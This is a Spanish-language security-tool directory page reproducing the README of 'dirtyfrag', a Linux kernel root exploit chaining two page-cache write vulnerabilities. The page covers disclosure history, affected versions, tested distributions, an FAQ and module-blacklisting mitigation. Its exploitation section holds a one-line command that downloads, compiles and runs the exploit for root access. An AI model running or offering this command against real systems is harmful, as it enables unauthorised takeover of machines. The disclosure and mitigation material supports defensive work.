Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
dirtyfrag — Exploit de escalada de privilegios del kernel de Linux que encadena dos vulnerabilidades de escritura en page-cache (CVE-2026-43284, CVE-2026-43500) para acceso root determinista en las principales distribuciones sin condiciones de carrera. | Kitploit
Herramientas/GitHubGitHub/v4bel/dirtyfrag
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónExplotación de Binarios
GitHubv4bel/dirtyfrag

dirtyfrag

Exploit de escalada de privilegios del kernel de Linux que encadena dos vulnerabilidades de escritura en page-cache (CVE-2026-43284, CVE-2026-43500) para acceso root determinista en las principales distribuciones sin condiciones de carrera.

Ver Repositorio
5.0k7839hace 4 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Dirty Frag: LPE universal de Linux

tux

Resumen

tux

Este documento describe la clase de vulnerabilidades Dirty Frag, descubierta y reportada por primera vez por Hyunwoo Kim (@v4bel), que puede obtener privilegios de root en las principales distribuciones de Linux encadenando la vulnerabilidad xfrm-ESP Page-Cache Write (CVE-2026-43284) y la vulnerabilidad RxRPC Page-Cache Write (CVE-2026-43500).

Dirty Frag es un caso que extiende la clase de bugs a la que pertenecen Dirty Pipe y Copy Fail. Debido a que es un bug lógico determinista que no depende de una ventana de tiempo, no se requiere condición de carrera, el kernel no entra en pánico cuando el exploit falla, y la tasa de éxito es muy alta.

Para información técnica detallada y la cronología, ver aquí.

  • xfrm-ESP Page-Cache Write (CVE-2026-43284) fue parcheado en mainline f4c50a4034e6.
  • RxRPC Page-Cache Write (CVE-2026-43500) fue parcheado en mainline aa54b1d27fe0.

[!NOTE] En el momento en que este documento se hizo público por primera vez (2026-05-07), el embargo se había roto debido a factores externos, por lo que aún no existía ningún parche o CVE. Después de consultar con los mantenedores en [email protected] en ese momento, el documento Dirty Frag se publicó a petición suya. Para la cronología de divulgación, consulte los detalles técnicos.

Explotación

Comando de una sola línea

root@kitploit:~
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

Este PoC se proporciona como información precisa tras la consulta con linux-distros. No lo utilice en sistemas que no esté autorizado a probar.

Limpieza

⚠️ Importante: Después de ejecutar este exploit, la caché de páginas queda contaminada. Para limpiar la caché de páginas contaminada y garantizar la estabilidad del sistema, ejecute:

root@kitploit:~
echo 3 > /proc/sys/vm/drop_caches

o reinicie el sistema.

Versiones afectadas

  • CVE-2026-43284: La vulnerabilidad xfrm-ESP Page-Cache Write está en alcance desde cac2661c53f3 (2017-01-17) hasta f4c50a4034e6 (2026-05-05).
  • CVE-2026-43500: La vulnerabilidad RxRPC Page-Cache Write está en alcance desde 2dc334f1a63a (2023-06-08) hasta aa54b1d27fe0 (2026-05-10).

En otras palabras, la vida útil efectiva de las vulnerabilidades es de unos 9 años.

Este Dirty Frag ha sido probado en las siguientes versiones de distribuciones.

  • Ubuntu 24.04.4: 6.17.0-23-generic
  • RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
  • openSUSE Tumbleweed: 7.0.2-1-default
  • CentOS Stream 10: 6.12.0-224.el10.x86_64
  • AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
  • Fedora 44: 6.19.14-300.fc44.x86_64
  • ...

Mitigación

  1. Use el siguiente comando para eliminar los módulos en los que ocurren las vulnerabilidades y limpiar la caché de páginas.
root@kitploit:~
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"
  1. Una vez que cada distribución aplique un parche de retroportación, actualice en consecuencia.

FAQ

¿Por qué encadenaste dos vulnerabilidades?

xfrm-ESP Page-Cache Write proporciona una potente primitiva arbitraria de STORE de 4 bytes como Copy Fail, y está incluida en la mayoría de las distribuciones, pero requiere el privilegio de crear un namespace.

Ubuntu a veces bloquea la creación de user namespaces sin privilegios mediante la política de AppArmor. En tal entorno, xfrm-ESP Page-Cache Write no se puede activar. RxRPC Page-Cache Write no requiere el privilegio de crear un namespace, pero el módulo rxrpc.ko en sí no está incluido en la mayoría de las distribuciones. Sin embargo, en Ubuntu, el módulo rxrpc.ko se carga por defecto.

Encadenar las dos variantes hace que los puntos ciegos se cubran mutuamente, permitiendo obtener privilegios de root en todas las distribuciones principales. Para más detalles, consulte el documento de detalles técnicos.

¿Otra serie "marca registrada" "Dirty"?

Sí, sí, lo sé. Sin embargo, esta vulnerabilidad es descendiente de "Dirty Pipe", y es una clase de bug que "ensucia" el miembro frag de struct sk_buff, por lo que este nombre es el más apropiado.

¿Cuál es su relación con la vulnerabilidad "Copy Fail"?

Copy Fail fue la motivación para comenzar esta investigación. En particular, xfrm-ESP Page-Cache Write en la cadena de vulnerabilidades Dirty Frag comparte el mismo sink que Copy Fail. Sin embargo, se activa independientemente de que el módulo algif_aead esté disponible. En otras palabras, incluso en sistemas donde se aplica la mitigación públicamente conocida de Copy Fail (lista negra de algif_aead), su Linux sigue siendo vulnerable a Dirty Frag.

Entonces, ¿cómo arreglo mi Linux?

Consulte la sección de Mitigación anterior.

Descargar herramienta